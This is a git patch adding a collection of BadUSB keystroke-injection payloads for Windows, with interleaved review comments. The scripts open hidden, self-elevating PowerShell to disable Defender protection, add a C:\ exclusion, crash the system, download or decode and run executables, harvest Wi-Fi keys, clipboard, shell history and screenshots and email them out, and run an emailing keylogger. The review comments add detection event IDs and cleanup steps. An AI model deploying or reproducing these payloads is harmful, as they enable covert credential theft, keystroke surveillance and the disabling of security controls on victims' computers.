From bcb876063023e002788a16d9d85245849a39f98d Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Mon, 8 May 2023 22:40:18 +0000 Subject: [PATCH] Add files via upload --- 5 second Screen Kill.txt | 20 + Add Exclusion C-drive.txt | 23 + BSOD.txt | 21 + Base64 Decode & Execute.txt | 30 ++ Disable RT-Protection.txt | 30 ++ Download-Execute from Run Prompt.txt | 23 + Dsktop Shortcut Spammer.txt | 24 + Email System & User Information.txt | 56 +++ Email System Info with Screenshot.txt | 61 +++ Installed Programs and Eventlogs to File.txt | 26 + Invoke Fake Update (.vbs).txt | 44 ++ Keylogger to Email.txt | 484 +++++++++++++++++++ Rickroll with Max Volume spam.txt | 51 ++ Set US Keyboard & System Language.txt | 30 ++ Simple NetCat Client.txt | 28 ++ Start Windows-93 (parody edition).txt | 33 ++ 16 files changed, 984 insertions(+) create mode 100644 5 second Screen Kill.txt create mode 100644 Add Exclusion C-drive.txt create mode 100644 BSOD.txt create mode 100644 Base64 Decode & Execute.txt create mode 100644 Disable RT-Protection.txt create mode 100644 Download-Execute from Run Prompt.txt create mode 100644 Dsktop Shortcut Spammer.txt create mode 100644 Email System & User Information.txt create mode 100644 Email System Info with Screenshot.txt create mode 100644 Installed Programs and Eventlogs to File.txt create mode 100644 Invoke Fake Update (.vbs).txt create mode 100644 Keylogger to Email.txt create mode 100644 Rickroll with Max Volume spam.txt create mode 100644 Set US Keyboard & System Language.txt create mode 100644 Simple NetCat Client.txt create mode 100644 Start Windows-93 (parody edition).txt diff --git a/5 second Screen Kill.txt b/5 second Screen Kill.txt new file mode 100644 index 0000000..ff855f8 --- /dev/null +++ b/5 second Screen Kill.txt 
@@ -0,0 +1,20 @@ +REM Title: 5 Second Display Kill +REM Author: @beigeworm +REM Description: Uses Powershell to kill all displays for a short period of time. +REM Target: Windows 10,11 + + +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +STRING (Add-Type '[DllImport("user32.dll")]public static extern int SendMessage +STRING (int hWnd, int hMsg, int wParam, int lParam);' -Name a -Pas)::SendMessage(-1,0x0112,0xF170,2);sleep 5;exit +ENTER diff --git a/Add Exclusion C-drive.txt b/Add Exclusion C-drive.txt new file mode 100644 index 0000000..32774f3 --- /dev/null +++ b/Add Exclusion C-drive.txt @@ -0,0 +1,23 @@ +REM Title: Add Exclusion C-drive +REM Author: @beigeworm +REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/ +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM add the exclusion path. +STRING Add-MpPreference -ExclusionPath C:/ +ENTER +DELAY 250 +STRING exit +ENTER diff --git a/BSOD.txt b/BSOD.txt new file mode 100644 index 0000000..edb5ba8 --- /dev/null +++ b/BSOD.txt @@ -0,0 +1,21 @@ +REM Title: Invoke BSOD +REM Author: @beigeworm +REM Description: This will open powershell and cause a blue screen. +REM Target: Windows 10 + +REM ***This is a dangerous script - Be Careful!!!*** + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +STRING taskkill /f /im svchost.exe +ENTER 
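Review bot: The header does not say that this payload runs elevated: `CTRL-SHIFT ENTER` followed by `ALT y` starts the hidden PowerShell as administrator and answers the UAC consent prompt by keystroke. The same sequence is repeated in most other files of this patch (Add Exclusion C-drive, BSOD, Base64 Decode & Execute, both Email scripts, Installed Programs and Eventlogs, Simple NetCat Client and more). I would add a line such as `REM Requires: unlocked session of a local administrator with consent-only UAC; the payload self-elevates`, so anyone assessing the script sees its precondition and privilege level. That precondition is also the control point for defenders: a standard-user account, or a UAC policy that asks for credentials, stops the `ALT y` step. The typed `powershell -NoP -NonI -W Hidden -Exec Bypass` line is normally kept in the user's Run-dialog history (the RunMRU key under HKCU) and appears in process-creation logs where command-line auditing is enabled.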
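Review bot: The exclusion set by `Add-MpPreference -ExclusionPath C:/` in Add Exclusion C-drive.txt is never removed and the header gives no restore step, so a machine used to test this keeps everything under C:\ excluded from Defender scanning after the script exits. I would document the revert next to the description, e.g. `REM Cleanup: Remove-MpPreference -ExclusionPath C:/`, and correct "ingore" to "ignore". On the monitoring side, exclusion changes are recorded as Defender configuration-change events (ID 5007 in the Windows Defender operational log), and a drive-root exclusion is worth alerting on by itself.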
diff --git a/Base64 Decode & Execute.txt b/Base64 Decode & Execute.txt new file mode 100644 index 0000000..8bef849 --- /dev/null +++ b/Base64 Decode & Execute.txt @@ -0,0 +1,30 @@ +REM Title: Base64 Decode & Execute +REM Author: @beigeworm +REM Description: Uses Powershell to decode a Base64 string and then execute the file. +REM Target: Windows 10 + +REM *SETUP* +REM replace all placeholders throughout the script. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM *replace this below* +STRING $b64 = 'YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES'; + +STRING $decodedFile = [System.Convert]::FromBase64String($b64); + + +REM *replace NAME_HERE and desired filetype (example is .exe)* +STRING $File = "NAME_HERE"+".exe"; + +STRING Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File \ No newline at end of file diff --git a/Disable RT-Protection.txt b/Disable RT-Protection.txt new file mode 100644 index 0000000..fa8c2b4 --- /dev/null +++ b/Disable RT-Protection.txt @@ -0,0 +1,30 @@ +REM Title: Disable Real-Time Protection +REM Author: @beigeworm +REM Description: Manually opens Windows Security window and turns offf Real-Time Protection. +REM Target: Windows 10 + + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open Windows Security GUI. +GUI r +DELAY 1500 +STRING windowsdefender:// +ENTER +DELAY 2000 + +REM run through option list and turn RT-protection off. +ENTER +TAB +TAB +TAB +TAB +ENTER +DELAY 200 +SPACE +DELAY 300 +ALT y +DELAY 400 +ALT F4 + diff --git a/Download-Execute from Run Prompt.txt b/Download-Execute from Run Prompt.txt new file mode 100644 index 0000000..ad1d856 --- /dev/null +++ b/Download-Execute from Run Prompt.txt 
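Review bot: Disable RT-Protection.txt changes a security setting by blind keystrokes (`ENTER`, four `TAB`, `ENTER`, `SPACE`, `ALT y`) with no check of which control has focus, and it never switches real-time protection back on. The focus order of the Windows Security app may differ between builds, so on an untested build the `SPACE` can land on a different setting. The header should record where this was verified and that the change must be reverted by hand, e.g. `REM Verified on: <WINDOWS_BUILD_PLACEHOLDER>; re-enable Real-time protection after the test`. The description also contains the typo "offf". Defender logs the switch-off as a real-time-protection-disabled event (ID 5001 in its operational log), which is a reliable alert for this technique.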
@@ -0,0 +1,23 @@ +REM Title: Download-Execute from Run Prompt +REM Author: @beigeworm +REM Description: Uses the Run Prompt to download a file and run it. +REM Target: Windows 10 + +REM *SETUP* +REM replace FILE_URL_HERE with the url of your file to run. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\;Start-Sleep 1; + +REM replace FILE_URL_HERE below. +STRING iwr -Uri FILE_URL_HERE -OutFile upl.exe;Start-Sleep 1;Start upl.exe;exit + +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 diff --git a/Dsktop Shortcut Spammer.txt b/Dsktop Shortcut Spammer.txt new file mode 100644 index 0000000..bf7a47c --- /dev/null +++ b/Dsktop Shortcut Spammer.txt @@ -0,0 +1,24 @@ +REM Title: Dsktop Shortcut Spammer +REM Author: @beigeworm +REM Description: Uses Powershell to generate a specified amount of shortcuts on the desktop. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM *replace 200 with the number of shortcuts you want to create.* +STRING $n = 200;$i = 0;while($i -lt $n){;$num = Get-Random;$Location = "C:\Windows\System32\rundll32.exe" + +REM rest of the script. +STRING ;$WshShell = New-Object -ComObject WScript.Shell;$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\USB Hardware" + $num + ".lnk") +STRING ;$Shortcut.TargetPath = $Location;$Shortcut.Arguments ="shell32.dll,Control_RunDLL hotplug.dll";$Shortcut.IconLocation = "hotplug.dll,0" +STRING ;$Shortcut.Description ="Device Removal";$Shortcut.WorkingDirectory ="C:\Windows\System32";$Shortcut.Save();Start-Sleep -Milliseconds 10;$i++};sleep 10;exit \ No newline at end of file 
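Review bot: The description of Download-Execute from Run Prompt.txt says only that a file is downloaded and run, but the first `STRING` line also executes `Add-MpPreference -ExclusionPath C:\` before the download, and nothing removes that exclusion or `upl.exe` from `$env:Temp` afterwards. That side effect belongs in the header, for example `REM Side effect: adds a Defender exclusion for C:\ (revert with Remove-MpPreference -ExclusionPath C:\)`. For detection, an exclusion change together with `iwr ... -OutFile` into the temp directory on a single hidden, elevated PowerShell command line is a distinctive combination.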
diff --git a/Email System & User Information.txt b/Email System & User Information.txt new file mode 100644 index 0000000..1e823de --- /dev/null +++ b/Email System & User Information.txt 
@@ -0,0 +1,56 @@ +REM Title: Email System & User Information +REM Author: @beigeworm +REM Description: Uses Powershell to gather user and system information and send to an Email. +REM Target: Windows 10 + +REM *REQUIREMENTS* +REM you will need a Microsoft Outlook Email address for this to work + +REM *SETUP* +REM replace EMAIL_HERE and PASSWORD_HERE below. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM replace EMAIL_HERE and PASSWORD_HERE below. +STRING $eml = "EMAIL_HERE";$psw = "PASSWORD_HERE" + +REM main powershell code +ENTER +DELAY 100 +STRING $usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String) +STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem +STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount +STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)" +STRING ;$sysstr += "`nMemory: $($sys.TotalVisibleMemorySize) MB";$sysstr += "`nComputer Name: $($comp.Name)";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version +STRING ;$progstr = "Installed Programs:`n";foreach($program in $iprog){;$progstr += "$($program.Name) $($program.Version)`n"} + +STRING ;$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+" +STRING ;foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ +STRING 
;$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None" +STRING ;foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$wifistr+="SSID: $ssid`nPassw: $pass`n"}}}$a++;} +STRING ;$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" + +STRING ;" USER INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII;$usr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" CLIPBOARD INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" POWERSHELL HISTORY`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" SYSTEM INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$sysstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" WIFI INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$wifistr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" PROGRAMS INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$progstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append + +STRING ;$syslog = "$env:temp\sys.txt";$subj = "$env:COMPUTERNAME : : Results";$body = "$env:COMPUTERNAME : Info Scraper Results... : $time" +STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Automation.PSCredential $eml, ($psw | ConvertTo-SecureString -AsPlainText -Force) +STRING ;$time = Get-Date;$ct = $time.addminutes($lost) + +STRING ;send-mailmessage -from $eml -to $eml -subject $subj -body $body -Attachment $syslog -smtpServer $smtp -port $prt -credential $cdtl -usessl +STRING ;sleep 1;exit +ENTER \ No newline at end of file 
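Review bot: The description ("gather user and system information") understates what this hunk collects. The `netsh wlan show profiles ... key=clear` loop reads every saved Wi-Fi key, and `Get-Clipboard` output and the PSReadLine `ConsoleHost_history.txt` are appended too, all as plain ASCII in `$env:temp\sys.txt`, which the script leaves on disk. The header should list these data classes, e.g. `REM Collects: saved Wi-Fi keys, clipboard, PowerShell history, account list, installed programs`, because clipboard and history routinely hold passwords and the output has to be handled as credential material. The mailbox password is typed in clear text as `$psw = "PASSWORD_HERE"`, so where script-block logging is enabled both the collection code and that credential end up in the PowerShell operational log. The same collection code is repeated in Email System Info with Screenshot.txt.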
diff --git a/Email System Info with Screenshot.txt b/Email System Info with Screenshot.txt new file mode 100644 index 0000000..4aa9f42 --- /dev/null +++ b/Email System Info with Screenshot.txt 
@@ -0,0 +1,61 @@ +REM Title: Email System & User Information +REM Author: @beigeworm +REM Description: Uses Powershell to gather user and system information and send to an Email. +REM Target: Windows 10 + +REM *IMPORTANT NOTE - upon testing 7th may 23, this script is detected by defender and blocked* +REM TURN OFF RT-PROTECTION BEFORE RUNNING + +REM *REQUIREMENTS* +REM you will need a Microsoft Outlook Email address for this to work + +REM *SETUP* +REM replace EMAIL_HERE and PASSWORD_HERE below. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM replace EMAIL_HERE and PASSWORD_HERE below. +STRING ;$email = "EMAIL_HERE";$pass = "PASSWORD_HERE" + +REM main powershell code +STRING ;$usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String) +STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem +STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount +STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)" +STRING ;$sysstr += "`nMemory: $($sys.TotalVisibleMemorySize) MB";$sysstr += "`nComputer Name: $($comp.Name)";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version +STRING ;$progstr = "Installed Programs:`n";foreach($program in $iprog){;$progstr += "$($program.Name) $($program.Version)`n"} + +STRING ;$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+" +STRING ;foreach($s in $ws){if($a -gt 1 -And $s 
-NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ +STRING ;$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None" +STRING ;foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$wifistr+="SSID: $ssid`nPassword: $pass`n"}}}$a++;} +STRING ;$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" + +STRING ;" USER INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII;$usr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" CLIPBOARD INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;;" POWERSHELL HISTORY`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" SYSTEM INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$sysstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" WIFI INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$wifistr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" PROGRAMS INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$progstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append + +STRING ;$scfile = "$env:temp\SC.png";Add-Type -AssemblyName System.Windows.Forms;Add-type -AssemblyName System.Drawing +STRING ;$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen;$Width = $Screen.Width;$Height = $Screen.Height;$Left = $Screen.Left;$Top = $Screen.Top +STRING ;$bitmap = New-Object System.Drawing.Bitmap $Width, $Height;$graphic = [System.Drawing.Graphics]::FromImage($bitmap) +STRING ;$graphic.CopyFromScreen($Left, $Top, 0, 0, 
$bitmap.Size);$bitmap.Save($scfile, [System.Drawing.Imaging.ImageFormat]::png) + +STRING ;Sleep 3;$syslog = "$env:temp\sys.txt";$subj = "$env:COMPUTERNAME : : Results";$body = "$env:COMPUTERNAME : Info Scraper Results... : $time" +STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Automation.PSCredential $email, ($pass | ConvertTo-SecureString -AsPlainText -Force) +STRING ;$time = Get-Date;$ct = $time.addminutes($lost) +STRING ;send-mailmessage -from $email -to $email -subject $subj -body $body -Attachment $syslog,$scfile -smtpServer $smtp -port $prt -credential $cdtl -usessl +STRING ;sleep 10;exit +ENTER \ No newline at end of file diff --git a/Installed Programs and Eventlogs to File.txt b/Installed Programs and Eventlogs to File.txt new file mode 100644 index 0000000..25052e0 --- /dev/null +++ b/Installed Programs and Eventlogs to File.txt 
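Review bot: The `REM Title` and `REM Description` of Email System Info with Screenshot.txt are copied unchanged from Email System & User Information.txt and do not mention the screen capture that `CopyFromScreen` saves to `$env:temp\SC.png` and attaches to the mail. I would change them to something like `REM Title: Email System Info with Screenshot` and name the screenshot in the description, so the header matches the file name and the data actually taken. The "TURN OFF RT-PROTECTION BEFORE RUNNING" instruction should also say that protection has to be restored afterwards. The author's own note that Defender blocks this script shows the default control is effective when it is left on.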
@@ -0,0 +1,26 @@ +REM Title: Programs and Eventlogs to File +REM Author: @beigeworm +REM Description: Uses Powershell to gather a list of installed programs and Windows Eventlogs and saves the info to a file. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM the main powershell script. +STRING $date = Get-Date -Format "yyyy-MM-dd-hh-mm-ss";$outputPath = "$env:temp\Osint-$date.txt";New-Item -ItemType File -Path $outputPath +STRING ;$installed = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version, Vendor;$hotfixes = Get-WmiObject -Class Win32_QuickFixEngineering | Select-Object -Property HotFixID, Description, InstalledOn +STRING ;$removed = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object -Property DisplayName, DisplayVersion, Publisher, InstallDate | Where-Object {$_.DisplayName -ne $null} +STRING ;$installed | Format-Table -AutoSize | Out-File -FilePath $outputPath ;$hotfixes | Format-Table -AutoSize | Out-File -FilePath $outputPath -Append +STRING ;$removed | Format-Table -AutoSize | Out-File -FilePath $outputPath -Append;$userActivity = Get-EventLog -LogName Security -EntryType SuccessAudit | Where-Object {$_.EventID -eq 4624 -or $_.EventID -eq 4634} +STRING ;$userActivity | Out-File -FilePath $outputPath -Append;$hardwareInfo = Get-EventLog -LogName System | Where-Object {$_.EventID -eq 12 -or $_.EventID -eq 13};$hardwareInfo | Out-File -FilePath $outputPath -Append +STRING ;sleep 30;exit +ENTER diff --git a/Invoke Fake Update (.vbs).txt b/Invoke Fake Update (.vbs).txt new file mode 100644 index 0000000..c3af84b --- /dev/null +++ b/Invoke Fake Update (.vbs).txt 
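Review bot: The variable `$removed` is filled from `HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*`, which holds the uninstall entries of software that is currently installed, so the name misdescribes that section of the output; `$uninstallEntries` would be accurate. `Get-WmiObject -Class Win32_Product` is also not a passive query: Windows Installer runs a consistency check on each MSI package, which can start repairs and writes a burst of MsiInstaller events to the Application log. That should be stated in the header, e.g. `REM Note: Win32_Product enumeration triggers an MSI consistency check on every package`. The output file `$env:temp\Osint-<date>.txt` includes Security-log logon events (4624/4634) and is left in the temp directory.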
@@ -0,0 +1,44 @@ +REM Title: Invoke Fake Windows Update +REM Author: @beigeworm +REM Description: Uses Powershell to create a .vbs script to open Chrome and fullscreen. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 200 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM create the .vbs script to start chrome and go fullscreen. +STRING cmd +ENTER +STRING cd $env:temp +ENTER +STRING copy con update.vbs +ENTER +STRING Set WshShell = WScript.CreateObject("WScript.Shell") +ENTER +STRING WshShell.Run "chrome.exe -new--window -kiosk https://fakeupdate.net/win8", 1, False +ENTER +STRING WshShell.Run "C:\Windows\System32\scrnsave.scr /s" +ENTER +STRING WScript.Sleep 200 +ENTER +STRING WshShell.SendKeys "{F11}" +ENTER +CTRL z +ENTER +STRING start update.vbs +ENTER +DELAY 1000 +STRING exit +ENTER +DELAY 1000 + + diff --git a/Keylogger to Email.txt b/Keylogger to Email.txt new file mode 100644 index 0000000..65d1e41 --- /dev/null +++ b/Keylogger to Email.txt 
@@ -0,0 +1,484 @@ +REM Title: Email System & User Info (old) +REM Author: @beigeworm +REM Description: Uses Powershell to gather system info and send it via Email. +REM Target: Windows 10 + +REM *NOTE* - There are a lot of ESCAPE characters half way down because typing speed is too fast for notepad. (Can be avoided by moving the mouse while flipper types) +REM this is a quick and dirty fix that i will revise in the near future. + +REM *REQUIREMENTS* +REM you will need a Microsoft Outlook Email address for this to work + +REM *SETUP* +REM replace YOUR_EMAIL and YOUR_PASSWORD. (check entire script) +REM set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM Open Notepad for script building. +DELAY 1000 +GUI r +DELAY 500 +STRING notepad +ENTER +DELAY 2500 +STRING Do{$FromTo = "YOUR_EMAIL";$Pass = "YOUR_PASSWORD";$RunTime = 1;$TimesRun = 1;$getT = Get-Date;$Subj = "$env:COMPUTERNAME : log Results";$body = "$env:COMPUTERNAME : Results : $strt" +ENTER +STRING $SMTP = "smtp.outlook.com";$Prt = "587";$Creds = new-object Management.Automation.PSCredential $FromTo, ($Pass | ConvertTo-SecureString -AsPlainText -Force) +ENTER +STRING $Attachment = $strt = Get-Date;$end = $strt.addminutes($RunTime);function Start-Key($Path="$env:temp\log.txt"){$sigs = @' +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); +ENTER +STRING '@ +ENTER +ENTER 
+STRING $API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun -ge $rnnr){ +ENTER +STRING while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = [console]::CapsLock +ENTER +STRING $virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object -TypeName System.Text.StringBuilder +ENTER +STRING $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}} +ENTER +STRING $getT = Get-Date};Sleep 3;send-mailmessage -from $FromTo -to $FromTo -subject $Subj -body $body -Attachment $Path -smtpServer $SMTP -port $Prt -credential $Creds -usessl +ENTER +STRING Remove-Item -Path $Path -force}}finally{$null = New-Item -Path $Path -ItemType File -Force}}Start-Key}While ($a -le 5) +ENTER +DELAY 1000 + +REM because typing speed can't be adjusted. 
(Can be avoided by moving the mouse while flipper types) +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE 